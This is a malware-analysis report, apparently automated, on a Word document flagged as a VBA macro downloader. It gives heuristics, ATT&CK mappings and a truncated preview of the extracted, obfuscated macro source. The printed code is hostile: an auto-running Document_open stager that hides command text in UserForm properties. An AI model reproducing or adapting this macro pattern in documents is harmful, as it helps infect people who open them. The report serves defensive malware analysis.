Verdict: MALICIOUS
Risk Score: 262
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains VBA macros, specifically a Document_Open macro that utilizes CreateObject and a hidden UserForm to execute code. This pattern is indicative of a downloader or stager designed to fetch and run additional malicious content. ClamAV detection further supports its malicious nature, identifying it as Doc.Downloader.Sagent-7454445-0. The specific obfuscation and lack of clear network indicators prevent definitive family attribution.
Heuristics (7)
- ClamAV: Doc.Downloader.Sagent-7454445-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Sagent-7454445-0
- VBA macros detected (medium, 4 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- VBA UserForm hidden-property command stager (critical, OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER): VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 8495340664534ab71148e9fa8c1206b3621a39d006fdb47cb146c469f25588ae) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10946 bytes |
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "Xmtcmcovmi"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Zepmlzbwtd, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Rbheeuczuaa = Gxrukoktavibm
Dompqccdqcind = Iiulysaldrcy
Ycrwgwgol = Dubrcagaimaga
Select _
Case Dcixnelx
Case 621
Qrxwmuxg _
= Hex _
(931)
Xyubqvxjtyvr = CVar(619)
Sdfnasrx _
= Hex(243)
Case 261
Ljjdvscaleg = CVar(121)
Hhsgbdsez _
= 28
Eiojgwdapdph = CDate _
(56)
Case 646
Nbvvfrvnvxgi = _
CInt(788)
Trmlonyndsu = Log(Fpfrzflo)
Judzqnqdxknhx = Szvaxcaqp
End Select
Wxyyfcuajiy = Ubrykrbtb
Zptoummdgm = Veclfzpmd
Lcbngutyvuo = Iggwwuruywv
Select _
Case Gwtlqgjail
Case 930
Fjnnakgfmczst _
= Hex _
(67)
Yumfftynx = CVar(97)
Dippaunxql _
= Hex(575)
Case 201
Ymppwdxar = CVar(143)
Kfvfnggvqjpgy _
= 896
Bffwzxuontqeb = CDate _
(655)
Case 489
Dsdkfjfozrkpn = _
CInt(65)
Fqazbsvvba = Log(Hmxcelqfwdn)
Wqfepigreoz = Ighxbkps
End Select
Zgewhemwrzvse = Ehukrdgrajm
Ojqeaobvjdr = Etlelbmygegsu
Oemujyihiqrp = Ueceszmgvxli
Select _
Case Ekmguigfq
Case 402
Awmdotlifladn _
= Hex _
(660)
Giipjbjacydl = CVar(697)
Mpofhrdacgdza _
= Hex(546)
Case 807
Egzeycxwanvrv = CVar(445)
Kiqmtwlyg _
= 833
Fgcmkbzexreg = CDate _
(798)
Case 95
Osnsmahqxwui = _
CInt(963)
Zsisugwruod = Log(Rlnfcusedxft)
Pifrbniefj = Pwxyzosiqe
End Select
Szurvytvyyqw
End Sub
Attribute VB_Name = "Rlndryuf"
Attribute VB_Base = "0{53A8F9CE-F62A-424E-B48F-7773908C8B41}{98A791E9-1E45-466D-8930-7B5DEEEE7885}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Sfxuqprex"
Function Gffrrmoptrb()
Pqtrejezznzb = Kasmtzhjhjls
Kttkhaqapomnr = Orkhyodbgzo
Ikgmzfpfu = Jajkdzgidtsr
Select _
Case Kkgsmktnks
Case 452
Anlokubpx _
= Hex _
(634)
Tygtgjmpt = CVar(250)
Ovinhfbw _
= Hex(417)
Case 906
Fuyswpjypln = CVar(20)
Nufrmdydl _
= 899
Yqfwnwob = CDate _
(947)
Case 866
Odiajudrdum = _
CInt(78)
Vtbnosrntry = Log(Jmkswmeqz)
Qdivmhinwakdl = Iqbuljhd
End Select
Wcqjsesti = Xmtcmcovmi.Zepmlzbwtd
Qswfsxekcft = Mtbbpcur
Uszoieuwtnhh = Bzacvridzpm
Vitpxbybn = Vfiiaqsfjm
Select _
Case Brwylqtkczv
Case 592
Zyjgmnngrhp _
= Hex _
(681)
Diwhzwvr = CVar(966)
Bcmkthgvjjuar _
= Hex(879)
Case 330
Wymjjkhplnkou = CVar(521)
Cwhaidaduzllf _
= 349
Dqnhcyjih = CDate _
(699)
Case 131
Naxjsmvkgxsr = _
CInt(414)
Wurkyzbqfktbm = Log(Toanppzg)
Zqvrikznl = Rxinrxvm
End Select
Nhgjclmumuee = Wcqjsesti + Rlndryuf.Qgqdkfeugdwb + Rlndryuf.Mqzqbhomi + Rlndryuf.Cighjeqo
Csgrspqptzf = Rezgxsbuauv
Bumpkdxaqb = Fvfuqrqzeup
Dsaucxkzjowce = Lqbchqsw
Select _
Case Jdesehef
Case 984
Lxfodgpvh _
= Hex _
(940)
Mcpootnzjkve = CVar(58)
Uggegrxphqnk _
= Hex(435)
Case 966
Bbwpnixbpeqnq = CVar(316)
Wqtlvjair _
= 407
Uxuyaegpxho = CDate _
(105)
Case 6
... (truncated)